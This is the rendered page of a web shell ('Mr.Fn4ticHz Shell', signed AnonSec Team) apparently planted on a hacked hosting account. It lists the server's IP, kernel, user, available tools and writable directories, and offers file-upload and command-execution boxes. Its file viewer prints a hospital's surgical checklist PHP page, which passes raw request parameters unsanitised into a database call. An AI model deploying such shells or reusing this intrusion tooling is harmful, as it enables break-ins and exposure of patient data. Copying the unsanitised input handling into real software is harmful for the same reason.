Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.145.86.211
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/Patient_Leaves.php
<?php session_start();
include 'dbconnection.php';
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST['covidcheck'])) 
{
   PatientManager::PatientLeaves("$_GET[prescriptionid]","$_GET[patientid]","$_GET[surgeryid]","$_POST[Verbally_Confirmed]","$_POST[Procedure_Recorded]","$_POST[Specimen_Labeled]","$_POST[infection_present]","$_POST[Equipment_Problems]","$_POST[Detail]","$_POST[Review_Key]","$_POST[Prognosis_Explained]","$_POST[entered_by]");
}
?>


<script>
function myFunction1031() {
  var checkBox = document.getElementById("myCheck1031");
  var text = document.getElementById("text1031");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
function myFunction1032() {
  var checkBox = document.getElementById("myCheck1032");
  var text = document.getElementById("text1032");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
</script>
<style>
.switch {
  position: relative;
  display: inline-block;
  width: 90px;
  height: 34px;
}

.switch input {display:none;}

.slider5 {
  position: absolute;
  cursor: pointer;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: #ca2222;
  -webkit-transition: .4s;
  transition: .4s;
   border-radius: 34px;
}

.slider5:before {
  position: absolute;
  content: "";
  height: 26px;
  width: 26px;
  left: 4px;
  bottom: 4px;
  background-color: white;
  -webkit-transition: .4s;
  transition: .4s;
  border-radius: 50%;
}

input:checked + .slider5 {
  background-color: #2ab934;
}

input:focus + .slider5 {
  box-shadow: 0 0 1px #2196F3;
}

input:checked + .slider5:before {
  -webkit-transform: translateX(26px);
  -ms-transform: translateX(26px);
  transform: translateX(55px);
}

/*------ ADDED CSS ---------*/
.slider5:after
{
 content:'Undone';
 color: white;
 display: block;
 position: absolute;
 transform: translate(-50%,-50%);
 top: 50%;
 left: 50%;
 font-size: 10px;
 font-family: Verdana, sans-serif;
}

input:checked + .slider5:after
{  
  content:'Done';
}


.center {
   border: 1px solid grey;
   text-align:;
}

  
    .box2{
              display: none;
    
    }
            
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
  </style>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>

    <style>


.center {
   border: 1px solid grey;
   text-align:;
}

</style>
  
   <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
$(document).ready(function(){
    $("select").change(function(){
        $(this).find("option:selected").each(function(){
            var optionValue = $(this).attr("value");
            if(optionValue){
                $(".box").not("." + optionValue).hide();
                $("." + optionValue).show();
            } else{
                $(".box").hide();
            }
        });
    }).change();
});
</script>
  
<meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
  <title>Document</title>

   </head>
  <body>
           <div class='center'>
<form name="covidcheck" method="post" enctype="multipart/form-data">
    <h3 align="center">Before Patient Leaves Operating Room</h3>
    <table id="example2" class="table table-bordered table-hover"> 
<tr>
<td width='50%'><span style="font-size: 20px">Surgical Assistant Verbally Confirmed With the Team</span></h3></td><td width='50%'><label class="switch">
  <input name="Verbally_Confirmed" type="checkbox">
  <span class="slider"></span>
</label>
</td>
</tr>
<tr>
<td width='50%'><span style="font-size: 20px">Name of the Procedure Recorded         </span></h3></td><td width='50%'><label class="switch">
  <input name="Procedure_Recorded" type="checkbox">
  <span class="slider"></span>
</label>
</td>
</tr>
<tr>
<td width='50%'><span style="font-size: 20px">Specimen Labeled (Including Patient Name)       </span></h3></td><td width='50%'><label class="switch">
  <input name="Specimen_Labeled" id="myCheck7" onclick="myFunction7()" type="checkbox">
  <span class="slider"></span>
</label>
</td>
</tr>
<tr>
<td width='50%'><span style="font-size: 20px">Checked whether infection present in or around Surgery  </span></h3></td><td width='50%'><label class="switch">
  <input name="infection_present" type="checkbox" id="myCheck1031" onclick="myFunction1031()">
  <span class="slider"></span>
</label>
</td>
</tr>

</table>

      <div id="text1031" style="display:none">
          
          Fill Surgical site Infection 
         </div>
         
<table id="example2" class="table table-bordered table-hover"> 
<tr>
<td width='50%'><span style="font-size: 20px">Any Equipment Problems to Be Addressed By Surgeon/Anesthetist ? </span></h3></td><td width='50%'><label class="switch">
  <input name="Equipment_Problems" type="checkbox"  id="myCheck1032" onclick="myFunction1032()">
  <span class="slider"></span>
</label>
</td>
</tr>
</table>
<div id="text1032" style="display:none">
<table id="example2" class="table table-bordered table-hover"> 
<tr>  <tr>
<td width='50%'><span style="font-size: 20px">Detail: </span></h3></td><td width='50%'><textarea name='Detail' rows="2" cols="70">
</textarea>
</td>
</tr>
</table></div>
<table id="example2" class="table table-bordered table-hover"> 
<tr>
<td width='50%'><span style="font-size: 20px">Review The Key Concerns For Recovery And Management Of The Patient: </span></h3></td><td width='50%'><textarea name='Review_Key' rows="2" cols="70">
</textarea>
</td>
</tr>

<tr>
<td width='50%'><span style="font-size: 20px">Prognosis Explained to patient Attendant:  </span></h3></td><td width='50%'><textarea name='Prognosis_Explained' rows="2" cols="70">
</textarea>
</td>
</tr>
</table>
<br>
<input type="submit" name="covidcheck" value="Submit">
</form>
        </div> 
<script src="../plugins/select2/js/select2.full.min.js"></script>
<script>
  $(function () {
    //Initialize Select2 Elements
    $('.select2').select2()

    //Initialize Select2 Elements
    $('.select2bs4').select2({
      theme: 'bootstrap4'
    })
    </script>
   


</body>
</html> 


Anon7 - 2022
AnonSec Team